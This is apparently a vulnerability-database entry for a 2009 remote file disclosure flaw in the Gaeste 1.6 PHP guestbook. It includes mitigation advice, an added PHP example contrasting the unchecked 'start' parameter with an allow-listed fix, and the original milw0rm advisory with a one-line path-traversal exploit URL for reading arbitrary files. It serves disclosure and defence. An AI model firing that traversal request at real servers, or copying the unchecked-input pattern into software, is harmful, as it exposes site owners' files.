Vendor: Gaeste 1.6
By: bd0rk
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Disclosure
CWE: 200
Product Name: Gaeste 1.6
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: YES
Related CWE: N/A
CPE: a:php4scripte.de:gaeste:1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability

Gaeste 1.6 is vulnerable to a remote file disclosure vulnerability. This vulnerability is due to insufficient sanitization of user-supplied input to the 'start' parameter in 'gastbuch.php'. An attacker can exploit this vulnerability to disclose sensitive information from arbitrary files on the vulnerable system.

Mitigation:

Upgrade to the latest version of Gaeste or apply the vendor's patch. Until then, the `start` value must be validated against an allow-list of page names before it reaches any file function.
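The following PHP is an added illustration, not code from the vendor or from the advisory below: it places the unchecked `$_GET['start']` assignment quoted from gastbuch.php beside an allow-listed version. The directory name `GB_BASE`, the page names and the fact that `$start` is turned into a file path are assumptions consistent with the reported impact.

```php
<?php
// Added illustration (not vendor or advisory code). The advisory quotes only the
// two lines that assign $_GET['start'] unchecked; what follows them is assumed.
declare(strict_types=1);

define('GB_BASE', __DIR__ . '/pages');   // assumed directory holding guestbook pages

// Vulnerable pattern (assumed continuation of the quoted lines): the raw 'start'
// value becomes a path, so '../' sequences walk out of GB_BASE.
function vulnerable_page_path(array $get): string
{
    $start = isset($get['start']) ? $get['start'] : 'index.php';
    return GB_BASE . '/' . $start;
}

// Hardened version: accept only a known page name, never a path fragment.
function safe_page_path(array $get): ?string
{
    $allowed = ['index.php', 'entries.php', 'sign.php'];   // assumed page names
    $start = isset($get['start']) ? (string)$get['start'] : 'index.php';
    if (!in_array($start, $allowed, true)) {
        return null;                                       // reject everything else
    }
    // Belt and braces: resolve the path and confirm it is still under GB_BASE.
    $base = realpath(GB_BASE);
    $path = realpath(GB_BASE . '/' . $start);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed request with the same shape as the advisory's URL.
$req = ['start' => '../../TARGETFILE.php'];
echo 'vulnerable: ' . vulnerable_page_path($req) . PHP_EOL;  // path escapes GB_BASE
var_dump(safe_page_path($req));                              // NULL: rejected
var_dump(safe_page_path(['start' => 'entries.php']));        // path, or NULL if absent
```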

Exploit-DB raw data:

               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
               +                                                                +
               + Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
               +                                                                +
               +                     bd0rk || SOH-Crew                          +
               +                                                                +
               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)

=> Vulnerable Code in gastbuch.php line 2-3

        -------------------------------
                              
           if (isset($_GET['start'])) {
           $start=$_GET['start'];

        -------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

# milw0rm.com [2009-02-09]